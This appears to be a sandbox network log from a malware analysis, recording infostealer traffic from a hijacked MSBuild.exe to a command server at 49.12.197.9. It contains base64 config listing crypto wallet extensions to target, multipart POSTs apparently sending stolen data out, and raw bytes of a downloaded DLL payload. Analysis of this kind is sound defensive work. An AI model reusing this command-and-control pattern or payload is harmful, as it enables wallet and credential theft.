                                                                                                                                                                                                                    2024-10-03 13:14:41 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                    Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    5192.168.2.85623849.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:41 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECF
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:41 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------AAAEBAFBGIDHCBFHIECFCont
                                                                                                                                                                                                                    2024-10-03 13:14:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:42 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:14:42 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    6192.168.2.85623949.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:43 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHI
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 5957
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:43 UTC5957OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------HCFCFHJDBKJKEBFHJEHICont
                                                                                                                                                                                                                    2024-10-03 13:14:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:43 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:14:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    7192.168.2.85624049.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC192OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:44 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 2459136
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Last-Modified: Thursday, 03-Oct-2024 13:14:44 GMT
                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                    Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                                                                                                                    Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                                                                                                                    Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                                                                                                                    Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                    Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                    Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                                                                                                                    Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                                                                                                                    Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                    2024-10-03 13:14:44 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                                                                                                                    Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    8192.168.2.85624149.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:47 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJE
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 829
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:47 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------DAAECAFHDBGIDGCAEHJECont
                                                                                                                                                                                                                    2024-10-03 13:14:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:48 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:14:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    9192.168.2.85624249.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:48 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 437
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:48 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------HJJKFBGCFHCGDHIDAAECCont
                                                                                                                                                                                                                    2024-10-03 13:14:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:49 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:14:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    10192.168.2.85624449.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
